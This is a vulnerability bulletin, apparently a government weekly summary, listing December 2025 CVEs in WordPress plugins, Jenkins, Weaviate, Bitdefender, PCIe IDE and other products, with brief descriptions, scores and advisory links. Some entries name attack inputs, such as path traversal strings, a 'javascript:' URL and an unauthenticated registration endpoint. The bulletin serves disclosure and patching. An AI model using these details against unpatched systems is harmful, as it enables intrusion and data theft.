| Andrew Lima--Sitewide Notice WP | Missing Authorization vulnerability in Andrew Lima Sitewide Notice WP sitewide-notice-wp allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Sitewide Notice WP: from n/a through <= 2.4.1. | 2025-12-09 | not yet calculated | CVE-2025-67575 | https://vdp.patchstack.com/database/Wordpress/Plugin/sitewide-notice-wp/vulnerability/wordpress-sitewide-notice-wp-plugin-2-4-1-broken-access-control-vulnerability?_s_id=cve |
| QuantumCloud--Simple Link Directory | Missing Authorization vulnerability in QuantumCloud Simple Link Directory simple-link-directory allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Simple Link Directory: from n/a through <= 8.8.3. | 2025-12-09 | not yet calculated | CVE-2025-67576 | https://vdp.patchstack.com/database/Wordpress/Plugin/simple-link-directory/vulnerability/wordpress-simple-link-directory-plugin-8-8-3-broken-access-control-vulnerability?_s_id=cve |
| hassantafreshi--Easy Form Builder | Missing Authorization vulnerability in hassantafreshi Easy Form Builder easy-form-builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Easy Form Builder: from n/a through <= 3.8.20. | 2025-12-09 | not yet calculated | CVE-2025-67577 | https://vdp.patchstack.com/database/Wordpress/Plugin/easy-form-builder/vulnerability/wordpress-easy-form-builder-plugin-3-8-20-broken-access-control-vulnerability?_s_id=cve |
| Rhys Wynne--WP Email Capture | Missing Authorization vulnerability in Rhys Wynne WP Email Capture wp-email-capture allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Email Capture: from n/a through <= 3.12.4. | 2025-12-09 | not yet calculated | CVE-2025-67578 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-email-capture/vulnerability/wordpress-wp-email-capture-plugin-3-12-4-broken-access-control-vulnerability?_s_id=cve |
| vanquish--User Extra Fields | Missing Authorization vulnerability in vanquish User Extra Fields wp-user-extra-fields allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects User Extra Fields: from n/a through <= 16.8. | 2025-12-09 | not yet calculated | CVE-2025-67579 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-user-extra-fields/vulnerability/wordpress-user-extra-fields-plugin-16-8-broken-access-control-vulnerability?_s_id=cve |
| Constant Contact--Constant Contact + WooCommerce | Missing Authorization vulnerability in Constant Contact Constant Contact + WooCommerce constant-contact-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Constant Contact + WooCommerce: from n/a through <= 2.4.1. | 2025-12-09 | not yet calculated | CVE-2025-67580 | https://vdp.patchstack.com/database/Wordpress/Plugin/constant-contact-woocommerce/vulnerability/wordpress-constant-contact-woocommerce-plugin-2-4-1-broken-access-control-vulnerability?_s_id=cve |
| themetechmount--TrueBooker | Missing Authorization vulnerability in themetechmount TrueBooker truebooker-appointment-booking allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects TrueBooker: from n/a through <= 1.1.0. | 2025-12-09 | not yet calculated | CVE-2025-67581 | https://vdp.patchstack.com/database/Wordpress/Plugin/truebooker-appointment-booking/vulnerability/wordpress-truebooker-plugin-1-1-0-broken-access-control-vulnerability?_s_id=cve |
| wbcomdesigns--Wbcom Designs | Missing Authorization vulnerability in wbcomdesigns Wbcom Designs lock-my-bp allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Wbcom Designs: from n/a through <= 2.1.1. | 2025-12-09 | not yet calculated | CVE-2025-67582 | https://vdp.patchstack.com/database/Wordpress/Plugin/lock-my-bp/vulnerability/wordpress-wbcom-designs-plugin-2-1-1-broken-access-control-vulnerability?_s_id=cve |
| ThemeAtelier--IDonate | Missing Authorization vulnerability in ThemeAtelier IDonate idonate allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects IDonate: from n/a through <= 2.1.15. | 2025-12-09 | not yet calculated | CVE-2025-67583 | https://vdp.patchstack.com/database/Wordpress/Plugin/idonate/vulnerability/wordpress-idonate-plugin-2-1-15-broken-access-control-vulnerability?_s_id=cve |
| rtCamp--GoDAM | Missing Authorization vulnerability in rtCamp GoDAM godam allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects GoDAM: from n/a through <= 1.4.6. | 2025-12-09 | not yet calculated | CVE-2025-67584 | https://vdp.patchstack.com/database/Wordpress/Plugin/godam/vulnerability/wordpress-godam-plugin-1-4-6-broken-access-control-vulnerability?_s_id=cve |
| flexmls--Flexmls IDX | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in flexmls Flexmls® IDX flexmls-idx allows Phishing. This issue affects Flexmls® IDX: from n/a through <= 3.15.7. | 2025-12-09 | not yet calculated | CVE-2025-67585 | https://vdp.patchstack.com/database/Wordpress/Plugin/flexmls-idx/vulnerability/wordpress-flexmls-idx-plugin-3-15-7-open-redirection-vulnerability?_s_id=cve |
| Ronald Huereca--Highlight and Share | Missing Authorization vulnerability in Ronald Huereca Highlight and Share highlight-and-share allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Highlight and Share: from n/a through <= 5.2.0. | 2025-12-09 | not yet calculated | CVE-2025-67586 | https://vdp.patchstack.com/database/Wordpress/Plugin/highlight-and-share/vulnerability/wordpress-highlight-and-share-plugin-5-2-0-broken-access-control-vulnerability?_s_id=cve |
| CRM Perks--WP Gravity Forms FreshDesk Plugin | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in CRM Perks WP Gravity Forms FreshDesk Plugin gf-freshdesk allows Phishing. This issue affects WP Gravity Forms FreshDesk Plugin: from n/a through <= 1.3.5. | 2025-12-09 | not yet calculated | CVE-2025-67587 | https://vdp.patchstack.com/database/Wordpress/Plugin/gf-freshdesk/vulnerability/wordpress-wp-gravity-forms-freshdesk-plugin-plugin-1-3-5-open-redirection-vulnerability?_s_id=cve |
| Elementor--Elementor Website Builder | Missing Authorization vulnerability in Elementor Elementor Website Builder elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Elementor Website Builder: from n/a through <= 3.33.0. | 2025-12-09 | not yet calculated | CVE-2025-67588 | https://vdp.patchstack.com/database/Wordpress/Plugin/elementor/vulnerability/wordpress-elementor-website-builder-plugin-3-33-0-broken-access-control-vulnerability?_s_id=cve |
| WP Overnight--WooCommerce PDF Invoices & Packing Slips | Missing Authorization vulnerability in WP Overnight WooCommerce PDF Invoices & Packing Slips woocommerce-pdf-invoices-packing-slips allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WooCommerce PDF Invoices & Packing Slips: from n/a through <= 4.9.1. | 2025-12-09 | not yet calculated | CVE-2025-67589 | https://vdp.patchstack.com/database/Wordpress/Plugin/woocommerce-pdf-invoices-packing-slips/vulnerability/wordpress-woocommerce-pdf-invoices-packing-slips-plugin-4-9-1-broken-access-control-vulnerability?_s_id=cve |
| Rustaurius--Ultimate FAQ | Cross-Site Request Forgery (CSRF) vulnerability in Rustaurius Ultimate FAQ ultimate-faqs allows Cross Site Request Forgery. This issue affects Ultimate FAQ: from n/a through <= 2.4.3. | 2025-12-09 | not yet calculated | CVE-2025-67590 | https://vdp.patchstack.com/database/Wordpress/Plugin/ultimate-faqs/vulnerability/wordpress-ultimate-faq-plugin-2-4-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| jegtheme--JNews Paywall | Cross-Site Request Forgery (CSRF) vulnerability in jegtheme JNews Paywall jnews-paywall allows Cross Site Request Forgery. This issue affects JNews Paywall: from n/a through < 12.0.1. | 2025-12-09 | not yet calculated | CVE-2025-67591 | https://vdp.patchstack.com/database/Wordpress/Plugin/jnews-paywall/vulnerability/wordpress-jnews-paywall-plugin-12-0-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Joe Dolson--My Calendar | Missing Authorization vulnerability in Joe Dolson My Calendar my-calendar allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects My Calendar: from n/a through <= 3.6.16. | 2025-12-09 | not yet calculated | CVE-2025-67592 | https://vdp.patchstack.com/database/Wordpress/Plugin/my-calendar/vulnerability/wordpress-my-calendar-plugin-3-6-16-broken-access-control-vulnerability?_s_id=cve |
| Stiofan--UsersWP | Cross-Site Request Forgery (CSRF) vulnerability in Stiofan UsersWP userswp allows Cross Site Request Forgery. This issue affects UsersWP: from n/a through <= 1.2.48. | 2025-12-09 | not yet calculated | CVE-2025-67593 | https://vdp.patchstack.com/database/Wordpress/Plugin/userswp/vulnerability/wordpress-userswp-plugin-1-2-48-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| ThimPress--Thim Elementor Kit | Authorization Bypass Through User-Controlled Key vulnerability in ThimPress Thim Elementor Kit thim-elementor-kit allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Thim Elementor Kit: from n/a through <= 1.3.3. | 2025-12-09 | not yet calculated | CVE-2025-67594 | https://vdp.patchstack.com/database/Wordpress/Plugin/thim-elementor-kit/vulnerability/wordpress-thim-elementor-kit-plugin-1-3-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Ays Pro--Quiz Maker | Cross-Site Request Forgery (CSRF) vulnerability in Ays Pro Quiz Maker quiz-maker allows Cross Site Request Forgery. This issue affects Quiz Maker: from n/a through <= 6.7.0.82. | 2025-12-09 | not yet calculated | CVE-2025-67595 | https://vdp.patchstack.com/database/Wordpress/Plugin/quiz-maker/vulnerability/wordpress-quiz-maker-plugin-6-7-0-82-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Strategy11 Team--Business Directory | Cross-Site Request Forgery (CSRF) vulnerability in Strategy11 Team Business Directory business-directory-plugin allows Cross Site Request Forgery. This issue affects Business Directory: from n/a through <= 6.4.19. | 2025-12-09 | not yet calculated | CVE-2025-67596 | https://vdp.patchstack.com/database/Wordpress/Plugin/business-directory-plugin/vulnerability/wordpress-business-directory-plugin-6-4-19-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Shahjahan Jewel--Fluent Booking | Missing Authorization vulnerability in Shahjahan Jewel Fluent Booking fluent-booking allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Fluent Booking: from n/a through <= 1.9.11. | 2025-12-09 | not yet calculated | CVE-2025-67597 | https://vdp.patchstack.com/database/Wordpress/Plugin/fluent-booking/vulnerability/wordpress-fluent-booking-plugin-1-9-11-broken-access-control-vulnerability?_s_id=cve |
| PSM Plugins--SupportCandy | Cross-Site Request Forgery (CSRF) vulnerability in PSM Plugins SupportCandy supportcandy allows Cross Site Request Forgery. This issue affects SupportCandy: from n/a through <= 3.4.1. | 2025-12-09 | not yet calculated | CVE-2025-67598 | https://vdp.patchstack.com/database/Wordpress/Plugin/supportcandy/vulnerability/wordpress-supportcandy-plugin-3-4-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| WebToffee--WebToffee eCommerce Marketing Automation | Missing Authorization vulnerability in WebToffee WebToffee eCommerce Marketing Automation decorator-woocommerce-email-customizer allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WebToffee eCommerce Marketing Automation: from n/a through <= 2.1.1. | 2025-12-09 | not yet calculated | CVE-2025-67599 | https://vdp.patchstack.com/database/Wordpress/Plugin/decorator-woocommerce-email-customizer/vulnerability/wordpress-webtoffee-ecommerce-marketing-automation-plugin-2-1-1-broken-access-control-vulnerability?_s_id=cve |
| Jenkins Project--Jenkins | Jenkins 2.540 and earlier, LTS 2.528.2 and earlier does not properly close HTTP-based CLI connections when the connection stream becomes corrupted, allowing unauthenticated attackers to cause a denial of service. | 2025-12-10 | not yet calculated | CVE-2025-67635 | Jenkins Security Advisory 2025-12-10 |
| Jenkins Project--Jenkins | A missing permission check in Jenkins 2.540 and earlier, LTS 2.528.2 and earlier allows attackers with View/Read permission to view encrypted password values in views. | 2025-12-10 | not yet calculated | CVE-2025-67636 | Jenkins Security Advisory 2025-12-10 |
| Jenkins Project--Jenkins | Jenkins 2.540 and earlier, LTS 2.528.2 and earlier stores build authorization tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system. | 2025-12-10 | not yet calculated | CVE-2025-67637 | Jenkins Security Advisory 2025-12-10 |
| Jenkins Project--Jenkins | Jenkins 2.540 and earlier, LTS 2.528.2 and earlier does not mask build authorization tokens displayed on the job configuration form, increasing the potential for attackers to observe and capture them. | 2025-12-10 | not yet calculated | CVE-2025-67638 | Jenkins Security Advisory 2025-12-10 |
| Jenkins Project--Jenkins | A cross-site request forgery (CSRF) vulnerability in Jenkins 2.540 and earlier, LTS 2.528.2 and earlier allows attackers to trick users into logging in to the attacker's account. | 2025-12-10 | not yet calculated | CVE-2025-67639 | Jenkins Security Advisory 2025-12-10 |
| Jenkins Project--Jenkins Git client Plugin | Jenkins Git client Plugin 6.4.0 and earlier does not correctly escape the path to the workspace directory as part of an argument in a temporary shell script generated by the plugin, allowing attackers able to control the workspace directory name to inject arbitrary OS commands. | 2025-12-10 | not yet calculated | CVE-2025-67640 | Jenkins Security Advisory 2025-12-10 |
| Jenkins Project--Jenkins Coverage Plugin | Jenkins Coverage Plugin 2.3054.ve1ff7b_a_a_123b_ and earlier does not validate the configured coverage results ID when creating coverage results, only when submitting the job configuration through the UI, allowing attackers with Item/Configure permission to use a `javascript:` scheme URL as identifier by configuring the job through the REST API, resulting in a stored cross-site scripting (XSS) vulnerability. | 2025-12-10 | not yet calculated | CVE-2025-67641 | Jenkins Security Advisory 2025-12-10 |
| Jenkins Project--Jenkins HashiCorp Vault Plugin | Jenkins HashiCorp Vault Plugin 371.v884a_4dd60fb_6 and earlier does not set the appropriate context for Vault credentials lookup, allowing attackers with Item/Configure permission to access and potentially capture Vault credentials they are not entitled to. | 2025-12-10 | not yet calculated | CVE-2025-67642 | Jenkins Security Advisory 2025-12-10 |
| Jenkins Project--Jenkins Redpen - Pipeline Reporter for Jira Plugin | Jenkins Redpen - Pipeline Reporter for Jira Plugin 1.054.v7b_9517b_6b_202 and earlier does not correctly perform path validation of the workspace directory while uploading artifacts to Jira, allowing attackers with Item/Configure permission to retrieve files present on the Jenkins controller workspace directory. | 2025-12-10 | not yet calculated | CVE-2025-67643 | Jenkins Security Advisory 2025-12-10 |
| miniflux--v2 | Miniflux 2 is an open source feed reader. Versions 2.2.14 and below treat redirect_url as safe when url.Parse(...).IsAbs() is false, enabling phishing flows after login. Protocol-relative URLs like //ikotaslabs.com have an empty scheme and pass that check, allowing post-login redirects to attacker-controlled sites. This issue is fixed in version 2.2.15. | 2025-12-11 | not yet calculated | CVE-2025-67713 | https://github.com/miniflux/v2/security/advisories/GHSA-wqv2-4wpg-8hc9 https://github.com/miniflux/v2/commit/76df99f3a3db234cf6b312be5e771485213d03c7 |
| zitadel--zitadel | ZITADEL is an open-source identity infrastructure tool. Versions 2.44.0 through 3.4.4 and 4.0.0-rc.1 through 4.7.1 disclose the total number of instance users to authenticated users, regardless of their specific permissions. While this does not leak individual user data or PII, disclosing the total user count via the totalResult field constitutes an information disclosure vulnerability that may be sensitive in certain contexts. This issue is fixed in versions 3.4.5 and 4.7.2. | 2025-12-11 | not yet calculated | CVE-2025-67717 | https://github.com/zitadel/zitadel/security/advisories/GHSA-f4cf-9rvr-2rcx https://github.com/zitadel/zitadel/commit/826039c6208fe71df57b3a94c982b5ac5b0af12c |
| formio--formio | Form.io is a combined Form and API platform for Serverless applications. Versions 3.5.6 and below and 4.0.0-rc.1 through 4.4.2 contain a flaw in path handling which could allow an attacker to access protected API endpoints by sending a crafted request path. An unauthenticated or unauthorized request could retrieve data from endpoints that should be protected. This issue is fixed in versions 3.5.7 and 4.4.3. | 2025-12-11 | not yet calculated | CVE-2025-67718 | https://github.com/formio/formio/security/advisories/GHSA-m654-769v-qjv7 https://github.com/formio/formio/commit/1836bdd9f55f5888ff397c257b2108c09d3de478 |
| ibexa--user | Ibexa is a composable end-to-end DXP (Digital Experience Platform). Versions 5.0.0-beta1 through 5.0.3 do not validate the previous password when a logged-in user changes their password. During the transition from v4 to v5 an error was introduced into the validation code which causes the validation of the previous password not to run as expected. This makes it possible for a logged-in user to change their password in the back office without knowing the previous password. For example, if a user logs into their account and walks away without locking their workstation, an attacker could access the unattended session and change the password, thereby locking the legitimate user out. This issue is fixed in version 5.0.4. | 2025-12-11 | not yet calculated | CVE-2025-67719 | https://github.com/ibexa/user/security/advisories/GHSA-x93p-w2ch-fg67 https://github.com/ibexa/user/commit/9d485bf385e6401c9f7ee80287d8ccd00f73dcf4 https://developers.ibexa.co/security-advisories/ibexa-sa-2025-005-password-change-and-xss-vulnerabilities-in-back-office |
| airlift--aircompressor | Aircompressor is a library with ports of the Snappy, LZO, LZ4, and Zstandard compression algorithms to Java. In versions 3.3 and below, incorrect handling of malformed data in the Java-based decompressor implementations for Snappy and LZ4 allows remote attackers to read previous buffer contents via crafted compressed input. With certain crafted compressed inputs, stale elements of the output buffer can end up in the uncompressed output, potentially leaking sensitive data. This is relevant for applications that reuse the same output buffer to uncompress multiple inputs, for example a web server that allocates a fixed-size buffer for performance reasons. There is a similar vulnerability in GHSA-cmp6-m4wj-q63q. This issue is fixed in version 3.4. | 2025-12-12 | not yet calculated | CVE-2025-67721 | https://github.com/airlift/aircompressor/security/advisories/GHSA-vx9q-rhv9-3jvg https://github.com/airlift/aircompressor/commit/f2b489b398779b40c1ee29ddb11d7edef54ddc15 https://github.com/airlift/aircompressor/commit/ff12c4d5757c9d6d1de3d39a10402f1f84f9b765 |
| parse-community--parse-server | Parse Server is an open source backend that can be deployed to any infrastructure that runs Node.js. In versions prior to 8.6.0-alpha.2, a GitHub CI workflow is triggered in a way that grants the GitHub Actions workflow elevated permissions, giving it access to GitHub secrets and the write permissions defined in the workflow. Code from a fork or from lifecycle scripts is potentially included. Only the repository's CI/CD infrastructure is affected, including any public GitHub forks with GitHub Actions enabled. This issue is fixed in version 8.6.0-alpha.2 and commits 6b9f896 and e3d27fe. | 2025-12-12 | not yet calculated | CVE-2025-67727 | https://github.com/parse-community/parse-server/security/advisories/GHSA-6w8g-mgvv-3fcj https://github.com/parse-community/parse-server/commit/6b9f8963cc3debf59cd9c5dfc5422aff9404ce9d https://github.com/parse-community/parse-server/commit/e3d27fea08c8d8bdd9770a689bc2d757cda48b66 |
| frappe--lms | Frappe Learning Management System (LMS) is a learning system that helps users structure their content. Versions prior to 2.42.0 allow authenticated users to add malicious HTML and JavaScript through description fields in the Job, Course and Batch forms. This issue is fixed in version 2.42.0. | 2025-12-12 | not yet calculated | CVE-2025-67730 | https://github.com/frappe/lms/security/advisories/GHSA-jjc4-j3hw-33h2 https://github.com/frappe/lms/commit/0877e32e1bfe64831b875707241de1c449cda45c |
| Aarondoran--servify-express | Servify Express is a Node.js package to start an Express server and log the port it's running on. Prior to 1.2, the Express server used express.json() without a size limit, which could allow attackers to send extremely large request bodies. This can cause excessive memory usage, degraded performance, or process crashes, resulting in a Denial of Service (DoS). Any application using the JSON parser without limits and exposed to untrusted clients is affected. The issue is not a flaw in Express itself, but in configuration. This issue is fixed in version 1.2. To work around, consider adding a limit option to the JSON parser, rate limiting at the application or reverse-proxy level, rejecting unusually large requests before parsing, or using a reverse proxy (such as NGINX) to enforce maximum request body sizes. | 2025-12-12 | not yet calculated | CVE-2025-67731 | https://github.com/Aarondoran/servify-express/security/advisories/GHSA-qgc4-8p88-4w7m https://github.com/Aarondoran/servify-express/commit/8dff7f56504b356278d849734ef2050e5cd23b61 https://github.com/Aarondoran/servify-express/releases/tag/V1.2 |
| frappe--lms | Frappe Learning Management System (LMS) is a learning system that helps users structure their content. Versions prior to 2.42.0 allowed authenticated attackers to enter JavaScript through the Company Website field of the Job Form, exposing users to an XSS attack. The script could then be executed in the browsers of users who opened the malicious job posting. This issue is fixed in version 2.42.0. | 2025-12-12 | not yet calculated | CVE-2025-67734 | https://github.com/frappe/lms/security/advisories/GHSA-c495-qg4v-5vr7 https://github.com/frappe/lms/commit/ca849da81558066d7614b9b6234004ff59c90632 |
| PCSX2--pcsx2 | PCSX2 is a free and open-source PlayStation 2 (PS2) emulator. In versions 2.5.377 and below, an unchecked offset and size used in a memcpy operation inside PCSX2's CDVD SCMD 0x91 and SCMD 0x8F handlers allow a specially crafted disc image or ELF to cause an out-of-bounds read from emulator memory. Because the offset and size are controlled through MG header fields, a specially crafted ELF can read data beyond the bounds of mg_buffer and have it reflected back into emulated memory. This issue is fixed in version 2.5.378. | 2025-12-12 | not yet calculated | CVE-2025-67749 | https://github.com/PCSX2/pcsx2/security/advisories/GHSA-69wg-97fx-8j5w https://github.com/PCSX2/pcsx2/commit/0b73eabd9ac19a5e290e7bee48d15be24e7b7d1b https://github.com/PCSX2/pcsx2/releases/tag/v2.5.378 |
| n/a--Weaviate OSS before 1.33.4. | An issue was discovered in Weaviate OSS before 1.33.4. An attacker with access to insert data into the database can craft an entry name with an absolute path (e.g., /etc/...) or use parent directory traversal (../../..) to escape the restore root when a backup is restored, potentially creating or overwriting files in arbitrary locations within the application's privilege scope. | 2025-12-12 | not yet calculated | CVE-2025-67818 | https://github.com/weaviate/weaviate https://weaviate.io/blog/weaviate-security-release-november-2025 |
| n/a--Weaviate OSS before 1.33.4. | An issue was discovered in Weaviate OSS before 1.33.4. Due to a lack of validation of the fileName field in the transfer logic, an attacker who can call the GetFile method while a shard is in the "Pause file activity" state and the FileReplicationService is reachable can read arbitrary files accessible to the service process. | 2025-12-12 | not yet calculated | CVE-2025-67819 | https://github.com/weaviate/weaviate https://weaviate.io/blog/weaviate-security-release-november-2025 |
| Bitdefender--Total Security | A local privilege escalation vulnerability in Bitdefender Total Security 27.0.46.231 allows low-privileged attackers to elevate privileges. The issue arises from bdservicehost.exe deleting files from a user-writable directory (C:\ProgramData\Atc\Feedback) without proper symbolic link validation, enabling arbitrary file deletion. This issue is chained with a file copy operation during network events and a filter driver bypass via DLL injection to achieve arbitrary file copy and code execution as elevated user. | 2025-12-10 | not yet calculated | CVE-2025-7073 | https://www.bitdefender.com/support/security-advisories/local-privilege-escalation-via-arbitrary-file-operation-in-bitdefender-atc-va-12590 |
| Gogs--Gogs | Improper Symbolic link handling in the PutContents API in Gogs allows Local Execution of Code. | 2025-12-10 | not yet calculated | CVE-2025-8110 | http://wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit |
| TECNO--com.transsion.audiosmartconnect | Unprotected service in the AudioLink component allows a local attacker to overwrite system files via unauthorized service invocation. | 2025-12-10 | not yet calculated | CVE-2025-9056 | https://security.tecno.com/SRC/securityUpdates |
| Unknown--WPS Visitor Counter Plugin | The WPS Visitor Counter Plugin WordPress plugin through 1.4.8 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers. | 2025-12-13 | not yet calculated | CVE-2025-9116 | https://wpscan.com/vulnerability/fe2eb926-96e8-419e-bf41-5531546e6590/ |
| Moxa--MXsecurity Series | An unauthenticated device registration vulnerability, caused by Improperly Controlled Modification of Dynamically-Determined Object Attributes, has been identified in the MXsecurity Series. An unauthenticated remote attacker can exploit this vulnerability by sending a specially crafted JSON payload to the device's registration endpoint /api/v1/devices/register, allowing the attacker to register unauthorized devices without authentication. Although exploiting this vulnerability allows limited modification of data, there is no impact on the confidentiality and availability of the affected device, and no loss of confidentiality, integrity, or availability within any subsequent systems. | 2025-12-10 | not yet calculated | CVE-2025-9315 | https://www.moxa.com/en/support/product-support/security-advisory/mpsa-252631-cve-2025-9315-unauthenticated-device-registration-vulnerability-in-mxsecurity-series |
| Rockwell Automation--432ES-IG3 Series A | A security issue exists within 432ES-IG3 Series A, which affects GuardLink® EtherNet/IP Interface, resulting in denial-of-service. A manual power cycle is required to recover the device. | 2025-12-09 | not yet calculated | CVE-2025-9368 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1764.html |
| Google Cloud--Cloud Data Fusion | A remote code execution (RCE) vulnerability exists in Google Cloud Data Fusion. A user with permissions to upload artifacts to a Data Fusion instance can execute arbitrary code within the core AppFabric component. This could allow the attacker to gain control over the Data Fusion instance, potentially leading to unauthorized access to sensitive data, modification of data pipelines, and exploration of the underlying infrastructure. The following CDAP versions include the necessary update to protect against this vulnerability: 6.10.6+ and 6.11.1+. Users must immediately upgrade to these or later versions, available at: https://github.com/cdapio/cdap-build/releases. | 2025-12-10 | not yet calculated | CVE-2025-9571 | https://docs.cloud.google.com/support/bulletins#gcp-2025-076 |
| PCI-SIG--PCI Express Integrity and Data Encryption (PCIe IDE) Specification | An issue was discovered in the PCI Express (PCIe) Integrity and Data Encryption (IDE) specification, where insufficient guidance on Transaction Layer Packet (TLP) ordering and tag uniqueness may allow encrypted packets to be replayed or reordered without detection. This can enable local or physical attackers on the PCIe bus to violate data integrity protections. | 2025-12-09 | not yet calculated | CVE-2025-9612 | https://pcisig.com/specifications https://pcisig.com/PCIeIDEStandardVulnerabilities |
| PCI-SIG--PCI Express Integrity and Data Encryption (PCIe IDE) Specification | A vulnerability was discovered in the PCI Express (PCIe) Integrity and Data Encryption (IDE) specification, where insufficient guidance on tag reuse after completion timeouts may allow multiple outstanding Non-Posted Requests to share the same tag. This tag aliasing condition can result in completions being delivered to the wrong security context, potentially compromising data integrity and confidentiality. | 2025-12-09 | not yet calculated | CVE-2025-9613 | https://pcisig.com/specifications https://pcisig.com/PCIeIDEStandardVulnerabilities |
| PCI-SIG--PCI Express Integrity and Data Encryption (PCIe IDE) Specification | An issue was discovered in the PCI Express (PCIe) Integrity and Data Encryption (IDE) specification, where insufficient guidance on re-keying and stream flushing during device rebinding may allow stale write transactions from a previous security context to be processed in a new one. This can lead to unintended data access across trusted domains, compromising confidentiality and integrity. | 2025-12-09 | not yet calculated | CVE-2025-9614 | https://pcisig.com/specifications https://pcisig.com/PCIeIDEStandardVulnerabilities |
| Portabilis--i-Educar | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Portabilis i-Educar allows Stored Cross-Site Scripting (XSS) via the matricula_interna parameter in the educar_usuario_cad.php endpoint. This issue affects i-Educar: 2.10.0. | 2025-12-09 | not yet calculated | CVE-2025-9638 | https://fluidattacks.com/advisories/travis https://github.com/portabilis/i-educar |
Vulnerability Summary for the Week of December 1, 2025
Posted on Monday December 08, 2025
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 10web--10Web Booster Website speed optimization, Cache & Page Speed optimizer | The 10Web Booster - Website speed optimization, Cache & Page Speed optimizer plugin for WordPress is vulnerable to arbitrary folder deletion due to insufficient file path validation in the get_cache_dir_for_page_from_url() function in all versions up to, and including, 2.32.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary folders on the server, which can easily lead to a loss of data or a denial of service condition. | 2025-12-06 | 9.6 | CVE-2025-13377 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f8bcf51a-36ee-4d4d-b9d6-d9db0dafd791?source=cve https://plugins.trac.wordpress.org/changeset/3402434/tenweb-speed-optimizer |
| Advantech--iView | Advantech iView versions 5.7.05.7057 and prior do not properly sanitize SNMP v1 trap (Port 162) requests, which could allow an attacker to inject SQL commands. | 2025-12-04 | 7.5 | CVE-2025-13373 | https://www.advantech.com/zh-tw/support/details/firmware?id=1-HIPU-183 https://www.cisa.gov/news-events/ics-advisories/icsa-25-338-07 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-338-07.json |
| aimeos--ai-cms-grapesjs | The Aimeos GrapesJS CMS extension provides page editor for creating content pages based on extensible components. Prior to 2021.10.8, 2022.10.8, 2023.10.8, 2024.10.8, and 2025.10.8, Javascript code can be injected by malicious editors for a stored XSS attack if the standard Content Security Policy is disabled. This vulnerability is fixed in 2021.10.8, 2022.10.8, 2023.10.8, 2024.10.8, and 2025.10.8. | 2025-12-02 | 7.7 | CVE-2025-66468 | https://github.com/aimeos/ai-cms-grapesjs/security/advisories/GHSA-424m-fj2q-g7vg https://github.com/aimeos/ai-cms-grapesjs/commit/2214f71ac27cdea25f11c8adf6bb5816db47a042 |
| ajitdas--Flex QR Code Generator | The Flex QR Code Generator plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the update_qr_code() function in all versions up to, and including, 1.2.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-12-06 | 9.8 | CVE-2025-12673 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3d71404e-0db8-485b-a626-5e0df2076c05?source=cve https://plugins.trac.wordpress.org/browser/flex-qr-code-generator/trunk/qr-code-generator.php#L457 https://ryankozak.com/posts/cve-2025-12673/ https://github.com/d0n601/CVE-2025-12673 |
| Akamai--Guardicore Platform Agent | The GC-AGENTS-SERVICE running as part of Akamai's Guardicore Platform Agent for Windows versions prior to v49.20.1, v50.15.0, v51.12.0, v52.2.0 is affected by a local privilege escalation vulnerability. The service will attempt to read an OpenSSL configuration file from a non-existent location that standard Windows users have default write access to. This allows an unprivileged local user to create a crafted "openssl.cnf" file in that location and, by specifying the path to a custom DLL file in a custom OpenSSL engine definition, execute arbitrary commands with the privileges of the Guardicore Agent process. Since Guardicore Agent runs with SYSTEM privileges, this permits an unprivileged user to fully elevate privileges to SYSTEM level in this manner. | 2025-12-03 | 7.8 | CVE-2025-53841 | https://www.tuv.com/landingpage/en/vulnerability-disclosure/ https://techdocs.akamai.com/guardicore-platform-agent/changelog https://community.akamai.com/customers/s/article/Windows-Agent-Vulnerability-Summary-and-Resolution |
| Argus Technology Inc.--BILGER | Insertion of Sensitive Information Into Sent Data vulnerability in Argus Technology Inc. BILGER allows Choosing Message Identifier. This issue affects BILGER: before 2.4.9. | 2025-12-02 | 7.5 | CVE-2025-13295 | https://www.usom.gov.tr/bildirim/tr-25-0423 |
